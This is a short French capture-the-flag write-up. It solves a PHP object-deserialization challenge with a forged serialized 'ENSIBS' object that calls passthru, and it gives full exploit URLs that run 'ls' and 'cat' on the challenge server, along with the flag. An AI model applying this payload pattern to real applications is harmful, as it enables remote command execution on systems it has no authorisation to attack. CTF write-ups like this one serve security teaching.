Writeup
=======

Il sagit d'une RCE. Il faut forger un objet via `?ENSIBS` (`passthru` + `cmd`).

Exploitation&nbsp;:

 1. `ls`&nbsp;: [http://myobject.ensibs.ctf/?ENSIBS=O:6:"ENSIBS":2:{s:2:"fn";s:8:"passthru";s:3:"dst";s:2:"ls";}](http://myobject.ensibs.ctf/?ENSIBS=O:6:"ENSIBS":2:{s:2:"fn";s:8:"passthru";s:3:"dst";s:2:"ls";})
 2. `cat my_super_flag.inc`&nbsp;: [http://myobject.ensibs.ctf/?ENSIBS=O:6:"ENSIBS":2:{s:2:"fn";s:8:"passthru";s:3:"dst";s:21:"cat my_super_flag.inc";}](http://myobject.ensibs.ctf/?ENSIBS=O:6:"ENSIBS":2:{s:2:"fn";s:8:"passthru";s:3:"dst";s:21:"cat my_super_flag.inc";})

Flag&nbsp;: `ENSIBS{OBJECT_SERIALIZATION}`
